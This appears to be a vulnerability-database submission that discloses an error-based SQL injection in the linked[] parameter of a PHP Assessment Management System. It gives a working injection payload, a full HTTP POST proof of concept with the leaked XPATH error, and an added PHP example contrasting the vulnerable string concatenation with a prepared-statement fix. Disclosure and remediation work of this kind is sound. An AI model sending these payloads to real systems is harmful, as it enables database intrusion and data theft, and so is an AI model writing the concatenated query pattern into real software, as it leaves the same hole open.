Submission #846713: Assessment Management System admin/add-module.php SQL Injection Vulnerability v1.0 SQL Injection

Title: Assessment Management System admin/add-module.php SQL Injection Vulnerability v1.0 SQL Injection

Description:

# Assessment Management System admin/add-module.php SQL Injection Vulnerability

A SQL injection vulnerability exists in the `admin/add-module.php` file of the Assessment Management System. The application directly concatenates user-controlled input from the `linked[]` parameter into an SQL `INSERT` statement without sanitization or parameterized statements. As a result, an attacker can inject arbitrary SQL syntax into the backend database query.

## Impact of the Vulnerability

This vulnerability may allow an attacker to manipulate backend SQL queries, trigger database error-based responses, and potentially extract sensitive database information. In some cases, it may also affect data integrity by altering the values inserted into the `module` table.

## Payload

```
Supervisor'and/**/extractvalue(1,concat(char(126),md5(1958213939)))and's
```

## Proof of Concept

Send the following request to the vulnerable endpoint:

```http
POST /admin/add-module.php HTTP/1.1
Host: assessment
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=f11os756ltsdgbtk776pklo8cs

code=dgfs&name=dsfg&level=3&leader=s1&description=dsgf&linked%5B%5D=Supervisor'and/**/extractvalue(1,concat(char(126),md5(1958213939)))and's&addmore%5B%5D=&submit=Add+Module
```

When the above payload is submitted through the `linked[]` parameter, the server responds with a database error message containing the injected MD5 marker:

```
XPATH syntax error: '~3320503cc081cf7022d480a9f46fd9f'
```

This demonstrates that user input is embedded into the SQL statement and executed by the database engine, confirming the presence of an error-based SQL injection vulnerability in `admin/add-module.php`.

## Source Download

[Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/)
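The concatenation pattern the advisory describes, beside the parameterized form a fix would use, as an added example written for this page and not code taken from the Assessment Management System; the `module` table and the request fields come from the advisory, while the column names and the `mysqli` usage are assumptions.

```php
<?php
// Added example, not the project's code. Table `module` and the POST fields
// (code, name, level, leader, description, linked[]) are from the advisory;
// the column names are assumed.

// Vulnerable pattern: each linked[] value is concatenated into the INSERT text.
function insert_module_vulnerable(mysqli $db, array $post): bool
{
    foreach ((array) ($post['linked'] ?? []) as $linked) {
        // A quote inside $linked closes the string literal, so the remainder is
        // parsed as SQL, and the raw database error is echoed back to the client.
        $sql = "INSERT INTO module (code, name, level, leader, description, linked)
                VALUES ('{$post['code']}', '{$post['name']}', '{$post['level']}',
                        '{$post['leader']}', '{$post['description']}', '$linked')";
        if (!$db->query($sql)) {
            die('Error: ' . $db->error); // leaks "XPATH syntax error: ..." messages
        }
    }
    return true;
}

// Hardened pattern: one prepared statement, every value passed as a bound parameter.
function insert_module_safe(mysqli $db, array $post): bool
{
    $stmt = $db->prepare(
        'INSERT INTO module (code, name, level, leader, description, linked)
         VALUES (?, ?, ?, ?, ?, ?)'
    );
    if ($stmt === false) {
        error_log('prepare failed: ' . $db->error); // log server-side, never echo
        return false;
    }
    $code = (string) ($post['code'] ?? '');
    $name = (string) ($post['name'] ?? '');
    $level = (int) ($post['level'] ?? 0);
    $leader = (string) ($post['leader'] ?? '');
    $description = (string) ($post['description'] ?? '');
    foreach ((array) ($post['linked'] ?? []) as $linked) {
        $linked = (string) $linked;
        // Values travel separately from the SQL text, so quotes in $linked stay data.
        $stmt->bind_param('ssisss', $code, $name, $level, $leader, $description, $linked);
        if (!$stmt->execute()) {
            error_log('insert failed: ' . $stmt->error);
            $stmt->close();
            return false;
        }
    }
    $stmt->close();
    return true;
}
```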
Source: https://github.com/zzzxc643/CVE1/blob/main/assessment/vul2.md
User: SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
Submitted: 2026. 06. 03. AM 07:05 (1 month ago)
Moderation: 2026. 07. 03. PM 08:48 (1 month later)
Status: Duplicate
VulDB entry: 338582 [code-projects Assessment Management 1.0 /admin/add-module.php linked[] SQL injection]
Points: 0
